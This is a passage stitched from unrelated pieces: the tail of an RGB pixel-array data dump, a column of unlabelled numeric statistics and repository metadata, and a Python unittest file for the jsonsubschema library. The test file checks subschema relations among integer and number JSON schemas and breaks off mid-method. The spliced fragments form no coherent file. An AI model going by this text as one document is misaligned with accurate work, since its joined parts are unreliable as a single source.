[255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 205, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [254, 205, 189]], [[43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], 
[43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [42, 29, 25], [43, 29, 24], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [43, 29, 24], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 104, 94], [145, 105, 94], [255, 254, 255], [63, 81, 181], [145, 105, 94], [145, 105, 94], [63, 81, 181], [255, 255, 255], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [84, 51, 42], [84, 51, 42], [145, 105, 94], [145, 105, 94], [144, 104, 94], [145, 105, 94], [145, 105, 94], [51, 34, 29], [153, 56, 56], [153, 56, 56], [51, 34, 29], [145, 105, 94], [144, 104, 94], [145, 105, 94], [145, 105, 94], [51, 34, 29], [51, 35, 29], [51, 34, 29], [51, 34, 29], [145, 105, 94], [144, 104, 94]]], 'phase': [[[0, 0, 0], [0, 188, 212], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 189, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 1, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [1, 188, 212], [255, 255, 255], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 188, 212], [0, 0, 0], [255, 255, 255], [0, 1, 0], [0, 188, 212], [0, 1, 0], [255, 255, 255], [1, 0, 1], [0, 188, 212], [0, 0, 0], [0, 188, 212], [1, 1, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 1, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [1, 0, 1], [0, 0, 0], [0, 0, 1], [0, 188, 212], [1, 1, 1], [0, 0, 0], [1, 0, 0], [0, 188, 212], [1, 0, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [254, 254, 254]], [[0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 1], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 188, 212], [0, 0, 0], [0, 188, 212], [1, 0, 0], [0, 0, 0], [0, 0, 0], [255, 255, 255], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 1, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [0, 188, 212], [254, 255, 254], [0, 0, 0], [255, 254, 255], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 188, 212], [1, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 1, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [0, 189, 213], [0, 0, 0], [0, 189, 212], [0, 0, 0], [0, 0, 1], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [1, 188, 212], [255, 255, 255], [0, 1, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0]]]}
| 17,227
| 34,453
| 0.342253
| 8,456
| 34,454
| 1.394513
| 0.00816
| 0.990502
| 1.406123
| 1.775441
| 0.981004
| 0.977866
| 0.96786
| 0.957938
| 0.95463
| 0.929783
| 0
| 0.451744
| 0.245458
| 34,454
| 1
| 34,454
| 34,454
| 0.001846
| 0
| 0
| 0
| 0
| 0
| 0.001132
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
3bd32dbb3e1eb8a4655fe2db4db2635d37f9c2b7
| 26,250
|
py
|
Python
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 16
|
2020-05-29T09:21:25.000Z
|
2022-01-12T09:03:29.000Z
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 9
|
2019-11-10T18:32:44.000Z
|
2022-02-18T00:47:14.000Z
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 9
|
2019-11-02T06:52:57.000Z
|
2022-01-03T08:35:24.000Z
|
'''
Created on May 30, 2019
@author: Andrew Habib
'''
import unittest
from jsonschema.exceptions import SchemaError
from jsonsubschema import isSubschema
class TestIntegerSubtype(unittest.TestCase):
    """Pairwise isSubschema checks between "integer"-typed JSON schemas.

    Method names encode the keywords each side carries: min/max bounds,
    an x prefix for draft-04 boolean exclusiveMinimum/exclusiveMaximum,
    mulOf for multipleOf, and join for anyOf unions.  Most tests assert
    both directions of the subtype relation in separate subTests.
    """

    def test_identity(self):
        # Reflexivity: every schema is a subschema of itself.
        s1 = {"type": "integer"}
        s2 = s1
        self.assertTrue(isSubschema(s1, s2))

    def test_min_min(self):
        s1 = {"type": "integer", "minimum": 5}
        s2 = {"type": "integer", "minimum": 1}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_max_max(self):
        s1 = {"type": "integer", "maximum": 10}
        s2 = {"type": "integer", "maximum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_max_min(self):
        # Half-open ranges overlapping in neither direction.
        s1 = {"type": "integer", "maximum": 10}
        s2 = {"type": "integer", "minimum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max(self):
        s1 = {"type": "integer", "minimum": 10}
        s2 = {"type": "integer", "maximum": 20}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_min_max1(self):
        # [5, 10] is strictly contained in [1, 20].
        s1 = {"type": "integer", "minimum": 5, "maximum": 10}
        s2 = {"type": "integer", "minimum": 1, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_min_max2(self):
        s1 = {"type": "integer", "minimum": 5, "maximum": 20}
        s2 = {"type": "integer", "minimum": 10, "maximum": 20}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_min_max_min_max3(self):
        # Disjoint ranges: neither contains the other.
        s1 = {"type": "integer", "minimum": 5, "maximum": 20}
        s2 = {"type": "integer", "minimum": 40, "maximum": 100}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_max_min_max(self):
        # (5, 20] is contained in [5, 20] but not vice versa.
        s1 = {"type": "integer", "minimum": 5,
              "exclusiveMinimum": True, "maximum": 20}
        s2 = {"type": "integer", "minimum": 5, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_max_min_xmax(self):
        # (5, 20] vs [5, 20): each admits a value the other excludes.
        s1 = {"type": "integer", "minimum": 5,
              "exclusiveMinimum": True, "maximum": 20}
        s2 = {"type": "integer", "minimum": 5,
              "maximum": 20, "exclusiveMaximum": True}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_xmax_min_max(self):
        s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "integer", "minimum": 5, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_xmin_xmax1(self):
        # For integers, (5, 20) and [6, 19] denote the same set.
        s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "integer", "minimum": 6, "maximum": 19}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_min_max_xmin_xmax2(self):
        s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "integer", "minimum": 6, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_xmax_xmin_xmax(self):
        # exclusiveMinimum: False is equivalent to an inclusive minimum.
        s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": False,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_mulOf1(self):
        s1 = {"type": "integer", "multipleOf": 10}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf2(self):
        # Multiples of 10 are a subset of multiples of 5.
        s1 = {"type": "integer", "multipleOf": 10}
        s2 = {"type": "integer", "multipleOf": 5}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf3(self):
        # 10 and 98 share no divisibility relation.
        s1 = {"type": "integer", "multipleOf": 10}
        s2 = {"type": "integer", "multipleOf": 98}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min(self):
        s1 = {"type": "integer", "multipleOf": 10}
        s2 = {"type": "integer", "minimum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min_min(self):
        s1 = {"type": "integer", "multipleOf": 10, "minimum": 10}
        s2 = {"type": "integer", "minimum": 5}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min_min_max(self):
        # s1 is unbounded above, so it escapes s2's maximum.
        s1 = {"type": "integer", "multipleOf": 10, "minimum": 10}
        s2 = {"type": "integer", "minimum": 5, "maximum": 500}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_mul(self):
        # No multiple of 15 lies in [5, 10]: s1 is the empty (bottom) schema.
        s1 = {"type": "integer", "minimum": 5, "maximum": 10, "multipleOf": 15}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join1(self):
        # The unconstrained branch makes the anyOf equal to all integers.
        s1 = {"anyOf": [{"type": "integer", "minimum": 5,
                         "maximum": 10}, {"type": "integer", }]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join2(self):
        s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
                        {"type": "integer", "minimum": 0}]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join3(self):
        s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
                        {"type": "integer", "minimum": 0, "maximum": 3}]}
        s2 = {"type": "integer", "minimum": -1}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join4(self):
        # [1, 8] straddles the gap between the two branches of s1.
        s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
                        {"type": "integer", "minimum": 0, "maximum": 4}]}
        s2 = {"type": "integer", "minimum": 1, "maximum": 8}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join5(self):
        # The exclusive minimum removes 5 from s1, so s2 (which admits 5)
        # is no longer a subschema.
        s1 = {"anyOf": [{"type": "integer", "minimum": 5, "exclusiveMinimum": True, "maximum": 10},
                        {"type": "integer", "minimum": 0, "maximum": 4}]}
        s2 = {"type": "integer", "minimum": 1, "maximum": 8}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join6(self):
        # [0, 10] union [11, inf) tiles [0, inf) exactly.
        s1 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 10},
                        {"type": "integer", "minimum": 11}]}
        s2 = {"type": "integer", "minimum": 0}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join_mulof1(self):
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
                        {"type": "integer"}]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join_mulof2(self):
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
                        {"type": "integer", "multipleOf": 7}]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join_mulof3(self):
        # Multiples of 35 = intersection of the two branches, hence a subset.
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
                        {"type": "integer", "multipleOf": 7}]}
        s2 = {"type": "integer", "multipleOf": 35}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join_mulof4(self):
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
                        {"type": "integer", "multipleOf": 7}]}
        s2 = {"type": "integer", "multipleOf": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join_mulof5(self):
        # Multiples of 6 are already multiples of 3, so the union collapses.
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 3},
                        {"type": "integer", "multipleOf": 6}]}
        s2 = {"type": "integer", "multipleOf": 3}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_join_mulof6(self):
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 12},
                        {"type": "integer", "multipleOf": 9}]}
        s2 = {"type": "integer", "multipleOf": 3}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join_mulof7(self):
        s1 = {"anyOf": [{"type": "integer", "multipleOf": 3, "maximum": 10},
                        {"type": "integer", "multipleOf": 5}]}
        s2 = {"type": "integer", "multipleOf": 3}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join_mulof8(self):
        s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 15, "multipleOf": 5},
                        {"type": "integer", "minimum": 5, "maximum": 15, "multipleOf": 3}]}
        s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 12, "multipleOf": 3},
                        {"type": "integer", "minimum": 1, "maximum": 20, "multipleOf": 5}]}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_join_mulof9(self):
        s1 = {"type": "integer", "minimum": -4, "maximum": 10, "multipleOf": 5}
        s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 20, "multipleOf": 10},
                        {"type": "integer", "minimum": 1, "maximum": 10, "multipleOf": 5}]}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    # @unittest.skip("Corner case of multipleOf") # check canonicalization/rewrite_enum
    def test_join_mulof10(self):
        # Mixes an enum schema into the union on the right-hand side.
        s1 = {"enum": [1, 3, 5, 7, 9, 10]}
        s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 20, "multipleOf": 10}, {
            "type": "integer", "minimum": 1, "maximum": 10, "multipleOf": 5}, {"enum": [1, 3, 7, 9]}]}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))
class TestNumberSubtype(unittest.TestCase):
    """Pairwise isSubschema checks between "number"-typed JSON schemas.

    Mirrors TestIntegerSubtype, but over the reals: bound tests that were
    equivalent for integers (e.g. (5, 20) vs [6, 19]) differ here because
    non-integral values lie between consecutive integers.
    """

    def test_identity(self):
        # Reflexivity: every schema is a subschema of itself.
        s1 = {"type": "number"}
        s2 = s1
        self.assertTrue(isSubschema(s1, s2))

    def test_min_min(self):
        s1 = {"type": "number", "minimum": 5}
        s2 = {"type": "number", "minimum": 1}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_max_max(self):
        s1 = {"type": "number", "maximum": 10}
        s2 = {"type": "number", "maximum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_max_min(self):
        s1 = {"type": "number", "maximum": 10}
        s2 = {"type": "number", "minimum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max(self):
        s1 = {"type": "number", "minimum": 10}
        s2 = {"type": "number", "maximum": 20}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_min_max1(self):
        s1 = {"type": "number", "minimum": 5, "maximum": 10}
        s2 = {"type": "number", "minimum": 1, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_min_max2(self):
        s1 = {"type": "number", "minimum": 5, "maximum": 20}
        s2 = {"type": "number", "minimum": 10, "maximum": 20}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_min_max_min_max3(self):
        # Disjoint ranges: neither direction holds.
        s1 = {"type": "number", "minimum": 5, "maximum": 20}
        s2 = {"type": "number", "minimum": 40, "maximum": 100}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_max_min_max(self):
        s1 = {"type": "number", "minimum": 5,
              "exclusiveMinimum": True, "maximum": 20}
        s2 = {"type": "number", "minimum": 5, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_max_min_xmax(self):
        s1 = {"type": "number", "minimum": 5,
              "exclusiveMinimum": True, "maximum": 20}
        s2 = {"type": "number", "minimum": 5,
              "maximum": 20, "exclusiveMaximum": True}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_xmax_min_max(self):
        s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "number", "minimum": 5, "maximum": 20}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_max_xmin_xmax1(self):
        # Over the reals, (5, 20) contains 5.5, which [6, 19] excludes;
        # contrast with the integer variant where the two sets coincide.
        s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "number", "minimum": 6, "maximum": 19}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_min_max_xmin_xmax2(self):
        s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "number", "minimum": 6, "maximum": 20}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_xmin_xmax_xmin_xmax(self):
        # exclusiveMinimum: False is equivalent to an inclusive minimum.
        s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": False,
              "maximum": 20, "exclusiveMaximum": True}
        s2 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
              "maximum": 20, "exclusiveMaximum": True}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_mulOf1(self):
        # Non-integral multipleOf is legal for "number".
        s1 = {"type": "number", "multipleOf": 10.5}
        s2 = {"type": "number"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf2(self):
        # Every multiple of 6 is a multiple of 1.5, not vice versa.
        s1 = {"type": "number", "multipleOf": 1.5}
        s2 = {"type": "number", "multipleOf": 6}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_mulOf3(self):
        # multipleOf must be strictly positive; a negative value makes the
        # schema itself invalid, so isSubschema raises SchemaError.
        s1 = {"type": "number", "multipleOf": .5}
        s2 = {"type": "number", "multipleOf": -.5}
        self.assertRaises(SchemaError, isSubschema, s1, s2)

    def test_mulOf4(self):
        # Multiples of 1 over the numbers = the integers, a proper subset.
        s1 = {"type": "number", "multipleOf": 1}
        s2 = {"type": "number"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min(self):
        s1 = {"type": "number", "multipleOf": 10}
        s2 = {"type": "number", "minimum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min_min(self):
        s1 = {"type": "number", "multipleOf": 10, "minimum": 10}
        s2 = {"type": "number", "minimum": 5}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_min_min_max(self):
        # s1 is unbounded above, so it escapes s2's maximum.
        s1 = {"type": "number", "multipleOf": 10, "minimum": 10}
        s2 = {"type": "number", "minimum": 5, "maximum": 500}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))
class TestNumericSubtype(unittest.TestCase):
    """Cross-type checks mixing "integer" and "number" schemas."""

    def test_int_num(self):
        # Integers are a proper subset of numbers.
        s1 = {"type": "integer"}
        s2 = {"type": "number"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_min_num_int(self):
        s1 = {"type": "number", "minimum": 1.5}
        s2 = {"type": "integer", "minimum": 1}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_num_min_int(self):
        s1 = {"type": "number", "multipleOf": 10}
        s2 = {"type": "integer", "minimum": 5}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_num_int(self):
        # Multiples of 10 are all integral, hence a subset of "integer".
        s1 = {"type": "number", "multipleOf": 10}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_mulOf_num_int2(self):
        # {"type": "number", "multipleOf": 1} is equivalent to "integer".
        s1 = {"type": "number", "multipleOf": 1}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_decimal1(self):
        # 10. and 10 must be treated as the same bound.
        s1 = {'maximum': 10.}
        s2 = {'maximum': 10}
        with self.subTest('LHS < RHS'):
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest('RHS > LHS'):
            self.assertTrue(isSubschema(s2, s1))

    def test_not1(self):
        # Negation of a numeric schema; s1_ spells out the expected
        # canonicalization of s1.  The assertions are disabled — NOTE(review):
        # the first commented check calls isSubschema(s1, s1) under an
        # 'LHS < RHS' label, which looks like a typo for (s1, s2); confirm
        # before re-enabling.
        s1 = {'not': {'type': 'integer', 'minimum': 10, 'maximum': 20}}
        s2 = {'not': {'minimum': 10, 'maximum': 20}}
        s1_ = {'anyOf': [{'type': 'boolean'}, {'type': 'object'}, {'type': 'null'}, {'type': 'array'}, {'type': 'string'}, {'maximum': 9, 'type': 'integer'}, {'minimum': 21, 'type': 'integer'}, {
            'type': 'number', 'maximum': 9}, {'type': 'number', 'minimum': 21}, {'allOf': [{'type': 'number', 'minimum': 10, 'maximum': 20}, {'not': {'type': 'integer'}}]}]}
        # with self.subTest('LHS < RHS'):
        # self.assertFalse(isSubschema(s1, s1))
        # with self.subTest('RHS > LHS'):
        # self.assertTrue(isSubschema(s2, s1))
class TestCompositeNumericSubtype(unittest.TestCase):
    """Checks involving composite (allOf/anyOf/enum) numeric schemas."""

    def test_invalid_schema(self):
        # allOf members must be schemas; a bare string is invalid either way.
        s1 = {"type": "integer"}
        s2 = {"type": "number",
              "allOf": [""]}
        with self.subTest():
            self.assertRaises(SchemaError, isSubschema, s1, s2)
        with self.subTest():
            self.assertRaises(SchemaError, isSubschema, s2, s1)

    def test_int_int_num1(self):
        # s2 = integers >= 10, a proper subset of all integers.
        s1 = {"type": "integer"}
        s2 = {"type": "number",
              "allOf": [{"type": "integer"}, {"type": "number", "minimum": 10}]}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_int_int_num2(self):
        s1 = {"type": "integer", "multipleOf": 5}
        s2 = {"type": "number",
              "allOf": [{"type": "integer"}, {"type": "number", "minimum": 10}]}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_int_mul_mul1(self):
        # s2 = integers that are multiples of 3; multiples of 5 are
        # incomparable with them.
        s1 = {"type": "integer", "multipleOf": 5}
        # BUG FIX: was "multipleOF" (capital F) — an unknown keyword that
        # JSON Schema silently ignores, so the intended top-level constraint
        # never applied.  Behavior-preserving here because the allOf member
        # already imposes multipleOf 3.
        s2 = {"type": "number",
              "multipleOf": 3,
              "allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_int_mul_mul2(self):
        # Multiples of 15 = integral multiples of both 3 and 5.
        s1 = {"type": "integer", "multipleOf": 15}
        s2 = {"type": "number",
              "multipleOf": 3,
              "allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 5}]}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_all_all_1(self):
        s1 = {"type": "integer",
              "allOf": [{"multipleOf": 3}, {"minimum": 5}]}  # 6, 9, 12, 15, 18, ...
        s2 = {"type": "number", "multipleOf": 3,
              "allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 5}]}  # ..., -30, -15, 15, 30, 45, ..
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_all_all_2(self):
        # Both sides reduce to integral multiples of 3.
        s1 = {"type": "integer",
              "allOf": [{"multipleOf": 3}]}
        s2 = {"type": "number", "multipleOf": 3,
              "allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_all_all_3(self):
        # Multiples of .3 include non-integers, so neither direction holds.
        s1 = {"type": "number", "allOf": [{"multipleOf": .3}]}
